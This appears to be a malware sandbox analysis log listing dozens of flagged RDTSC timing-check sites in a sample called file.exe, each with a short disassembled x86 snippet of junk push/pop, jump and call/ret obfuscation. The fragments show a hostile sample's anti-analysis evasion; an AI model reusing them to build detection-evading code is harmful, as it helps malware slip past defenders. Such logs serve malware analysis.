Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B94370 second address: B9439B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnl 00007FB8FCCA77B6h 0x0000000c jmp 00007FB8FCCA77BFh 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 popad 0x00000014 pushad 0x00000015 jmp 00007FB8FCCA77BAh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9B337 second address: B9B37E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCD64885h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FB8FCD6487Eh 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FB8FCD64889h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9B37E second address: B9B396 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB8FCCA77B8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 jc 00007FB8FCCA77B6h 0x00000017 pop esi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9B396 second address: B9B3B3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jl 00007FB8FCD64876h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 pushad 0x00000011 push esi 0x00000012 jo 00007FB8FCD64876h 0x00000018 pop esi 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9B3B3 second address: B9B3B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9B3B7 second address: B9B3BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9B457 second address: B9B465 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB8FCCA77B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9F6EA second address: B9F6F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9F6F2 second address: B9F6F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9F85B second address: B9F87A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FB8FCD64888h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9FDB6 second address: B9FDBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA0094 second address: BA00AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB8FCD6487Ah 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA00AA second address: BA00B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA00B0 second address: BA00B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA00B4 second address: BA00E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCCA77C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FB8FCCA77C4h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA00E2 second address: BA00E7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA5D6A second address: BA5D70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA5D70 second address: BA5D87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB8FCD6487Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA5D87 second address: BA5D9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCCA77C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA4779 second address: BA477D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA477D second address: BA4789 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA4789 second address: BA4799 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCD6487Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA4799 second address: BA47C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007FB8FCCA77D7h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA47C9 second address: BA47DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8FCD6487Bh 0x00000009 jbe 00007FB8FCD64876h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA4909 second address: BA4916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 jc 00007FB8FCCA77B6h 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA4916 second address: BA491C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA491C second address: BA4920 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA4920 second address: BA492E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FB8FCD6487Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA4B9F second address: BA4BC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8FCCA77C6h 0x00000009 pop edi 0x0000000a jns 00007FB8FCCA77BCh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA5492 second address: BA5498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA563C second address: BA5640 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA5640 second address: BA5646 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA5646 second address: BA566A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007FB8FCCA77C8h 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA566A second address: BA5670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5739E second address: B573A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FB8FCCA77B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA44C9 second address: BA44D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BADE8A second address: BADEA4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FB8FCCA77C4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BAD9EB second address: BAD9EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BAD9EF second address: BADA11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCCA77BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jmp 00007FB8FCCA77BCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BADA11 second address: BADA4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jo 00007FB8FCD64876h 0x0000000f push esi 0x00000010 pop esi 0x00000011 jmp 00007FB8FCD6487Bh 0x00000016 popad 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007FB8FCD64889h 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BADA4B second address: BADA50 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BADA50 second address: BADA76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8FCD64888h 0x00000009 pop esi 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BAE8BD second address: BAE8C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BAE8C3 second address: BAE8C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BAE8C8 second address: BAE8D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FB8FCCA77B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BAE8D2 second address: BAE8F5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB8FCD64876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB8FCD64887h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BAEA2E second address: BAEA34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BAEA34 second address: BAEA49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FB8FCD6487Eh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BAEA49 second address: BAEA55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FB8FCCA77B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BAEA55 second address: BAEA59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BAEA59 second address: BAEA73 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB8FCCA77B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007FB8FCCA77B8h 0x00000010 pushad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 pop eax 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB28D7 second address: BB28FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FB8FCD64876h 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007FB8FCD6488Ch 0x00000012 jmp 00007FB8FCD64884h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB28FF second address: BB290A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FB8FCCA77B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB290A second address: BB2910 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B268DC second address: B268E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B268E2 second address: B268E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB7B5A second address: BB7B5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB6856 second address: BB6860 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB8FCD64882h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7819D second address: B781B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCCA77BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jns 00007FB8FCCA77BCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7829A second address: B782A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B782A0 second address: B782A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B78434 second address: B78438 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B78438 second address: B78441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B784A7 second address: B784AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B784AD second address: B784B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B784B5 second address: B784C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 jg 00007FB8FCD64880h 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B785B5 second address: B785BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B78B20 second address: B78B64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FB8FCD6487Fh 0x0000000d nop 0x0000000e mov dword ptr [ebp+122D1AC9h], edi 0x00000014 push 0000001Eh 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007FB8FCD64878h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 00000016h 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 nop 0x00000031 push eax 0x00000032 push edx 0x00000033 push esi 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B78B64 second address: B78B69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B78B69 second address: B78BAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB8FCD64888h 0x00000008 jmp 00007FB8FCD64883h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 push ecx 0x00000013 jmp 00007FB8FCD6487Ah 0x00000018 pop ecx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B78ED4 second address: B78ED8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B78ED8 second address: B78F4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007FB8FCD64878h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D1A28h], eax 0x00000028 lea eax, dword ptr [ebp+12489B7Eh] 0x0000002e push 00000000h 0x00000030 push esi 0x00000031 call 00007FB8FCD64878h 0x00000036 pop esi 0x00000037 mov dword ptr [esp+04h], esi 0x0000003b add dword ptr [esp+04h], 0000001Bh 0x00000043 inc esi 0x00000044 push esi 0x00000045 ret 0x00000046 pop esi 0x00000047 ret 0x00000048 add dword ptr [ebp+122D24A7h], eax 0x0000004e sbb dh, 00000073h 0x00000051 push eax 0x00000052 push ecx 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007FB8FCD64882h 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B78F4E second address: B78F52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B78F52 second address: B78FB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FB8FCD64878h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 lea eax, dword ptr [ebp+12489B3Ah] 0x0000002a push 00000000h 0x0000002c push edi 0x0000002d call 00007FB8FCD64878h 0x00000032 pop edi 0x00000033 mov dword ptr [esp+04h], edi 0x00000037 add dword ptr [esp+04h], 0000001Bh 0x0000003f inc edi 0x00000040 push edi 0x00000041 ret 0x00000042 pop edi 0x00000043 ret 0x00000044 jg 00007FB8FCD6487Bh 0x0000004a cmc 0x0000004b push eax 0x0000004c ja 00007FB8FCD6487Eh 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B78FB7 second address: B5739E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov dword ptr [esp], eax 0x00000008 clc 0x00000009 call dword ptr [ebp+122D36A9h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FB8FCCA77C5h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB6ECD second address: BB6ED4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB71B2 second address: BB71D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FB8FCCA77C7h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB7669 second address: BB766D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB9CC7 second address: BB9CCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB9CCD second address: BB9CD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBD278 second address: BBD2A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jbe 00007FB8FCCA77C2h 0x0000000d jp 00007FB8FCCA77B6h 0x00000013 ja 00007FB8FCCA77B6h 0x00000019 jo 00007FB8FCCA77BAh 0x0000001f pushad 0x00000020 popad 0x00000021 pushad 0x00000022 popad 0x00000023 js 00007FB8FCCA77D3h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBCB4C second address: BBCB5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FB8FCD6487Bh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBCF9F second address: BBCFB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FB8FCCA77B6h 0x0000000a popad 0x0000000b push esi 0x0000000c jnp 00007FB8FCCA77B6h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC19EB second address: BC19F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC7A96 second address: BC7A9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC7A9C second address: BC7AC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB8FCD6487Fh 0x0000000a pop ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d jg 00007FB8FCD64876h 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jno 00007FB8FCD64876h 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC7AC4 second address: BC7AE3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB8FCCA77B6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FB8FCCA77BFh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC7AE3 second address: BC7AE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC7AE9 second address: BC7AF3 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB8FCCA77B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC6827 second address: BC686D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB8FCD64881h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007FB8FCD64888h 0x00000013 push edx 0x00000014 pop edx 0x00000015 jmp 00007FB8FCD64880h 0x0000001a jp 00007FB8FCD64885h 0x00000020 rdtsc
